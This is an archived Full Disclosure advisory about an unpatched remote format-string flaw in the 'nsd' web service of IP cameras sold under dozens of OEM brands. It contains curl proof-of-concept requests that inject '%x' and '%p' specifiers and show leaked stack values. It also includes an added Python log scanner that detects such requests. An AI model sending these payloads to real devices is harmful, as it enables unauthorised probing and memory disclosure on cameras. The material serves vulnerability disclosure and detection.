lists.openwall.net - Open Source and information security mailing list archives
Message-ID: <8DD925D8-5BFD-4C8A-BA72-B259C142CD23@noemail.eu>
Date: Fri, 15 Dec 2017 00:40:41 +0000
From: bashis <mcw@...mail.eu>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] 0-day: Remote Stack Format String in 'nsd' binary from multiple OEM

[STX]

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM

Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 14, 2017
Full Disclosure: 0-Day


-[ PoC ]-

1)
$ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB'

[...]
	 function initHideWidget(){
	 document.getElementById("devip").value = "192.168.57.20";
	 document.getElementById("cameraid").value = 1;
	 document.getElementById("streamid").value = 1;
	 document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069";
	 document.getElementById("lg").value = "BBBB";
	 document.getElementById("port").value = 60000;
	 document.getElementById("ipver").value = 1;
	 document.getElementById("tprotocol").value = 2;
	 document.getElementById("devtype").value = 1;
	 document.getElementById("ismotorize").value = 1;

[...]
Note: 'BBBB' is hiding within '5e3006db'

2)
$ curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p"
[...]
	 function initHideWidget(){
	 document.getElementById("ip").value = "192.168.57.20";
	 document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1";
	 document.getElementById("port").value = 60000;
	 document.getElementById("ipver").value = 1;
	 document.getElementById("tprotocol").value = 2;
	 document.getElementById("devtype").value = 1;
[...]
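As an added detection example (not part of the advisory, the PoC repository or any vendor's code), the following scans web-server access logs for printf-style conversions in the 'ID' and 'lg' parameters of the two endpoints shown above. The combined log format and the sample log lines are assumed and constructed here; both the raw and the percent-decoded parameter values are checked, since decoding first would hide a '%08x' and skipping decoding would miss an encoded '%25%78'.

```python
import re
from urllib.parse import urlsplit, unquote

# Endpoints and query parameters named in the advisory above.
WATCHED_ENDPOINTS = {"/main/index.asp", "/maintain/upgrade.asp"}
WATCHED_PARAMS = {"id", "lg"}
# printf conversion: optional "%3$"-style arg, flags, width, precision, length, conversion char.
FMT_SPEC = re.compile(
    r"%(?:\d+\$)?[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|q|j|z|t|L)?[diouxXeEfFgGaAcspn]")
# Request field of a combined-log-format line (assumed): "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def _raw_params(query):
    """Split the query WITHOUT decoding values: unquote() would turn the '%08'
    of '%08x' into a backspace byte and hide the specifier."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        yield unquote(key).lower(), value

def inspect_target(target):
    """Watched param -> sorted conversions found, scanning the raw and the decoded
    value (catches '%25%78', which the server decodes to '%x'). {} = clean."""
    parts = urlsplit(target)
    if parts.path.lower() not in WATCHED_ENDPOINTS:
        return {}
    findings = {}
    for key, value in _raw_params(parts.query):
        if key in WATCHED_PARAMS:
            specs = set(FMT_SPEC.findall(value)) | set(FMT_SPEC.findall(unquote(value)))
            if specs:
                findings[key] = sorted(specs)
    return findings

def scan_access_log(lines):
    """Return [(line_no, path, findings)] for suspicious requests to watched endpoints."""
    alerts = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        findings = inspect_target(m.group("target")) if m else {}
        if findings:
            alerts.append((n, urlsplit(m.group("target")).path, findings))
    return alerts

# Constructed sample lines (not from the advisory): a benign request, one
# shaped like PoC 1, and one shaped like PoC 2 with a percent-encoded '%x'.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Dec/2017:22:01:03 +0000] "GET /main/index.asp?ID=cam1&lg=en HTTP/1.1" 200 512',
    '10.0.0.9 - - [14/Dec/2017:22:01:09 +0000] "GET /main/index.asp?ID=AAAA|%x|%x|%08x&lg=BBBB HTTP/1.1" 200 611',
    '10.0.0.9 - - [14/Dec/2017:22:01:15 +0000] "GET /Maintain/upgrade.asp?ID=|%25%78|%p HTTP/1.1" 200 433',
]
```

Running scan_access_log(SAMPLE_LOG) flags lines 2 and 3 and reports which conversions appeared in the 'id' parameter of each.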


-[ Affected OEM ]-

Huatu
I-View
IP Camera Web Service
Stanley Security
3D Eyes CCTV Platform
Protech Srl
LS vision 
GWSECU
12 Legion Solution
HDVuk IP Camera
Intervid Security
Suzuki Tech
Wellsite IP Camera
iBrido
Protec IP Camera
Maxtron IP Camera
Ascendent
GTvs IP Camera
Squilla
Bikal IP Camera
MW Power
Alfa Vision
KMA Security
Tough Dog Security
Kpro HQ
Lanetwork
AFM Vision
ZetaDo
Jobsight Inc.
Datalab IP Technologies
4Tvision
Proline UK
Tanz
Aisonic
HD-IP
PreSec Security Solution
EagleVision
Elemis Delta
Imenara
Gigamedia
Xavee
Honeywell
Boss Security
A.R.T Surveillance
Global Security
Securicorp
Securetech
Vapplica
Star
Stic
NeXus
Alnet
Spy Smart
Kompsos
Adler Security Systems
Nextan
Access
Toprotect
Kawah
LS StrateX
Senpei CCTV
Metcom
Doron Technologies
Saviour Smart IoT Systems
Eagle-Eye
Faucon.at
BlueEagle Security
Campro
Opple
Level One
Video and Monitor System
K&D

[ETX]



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
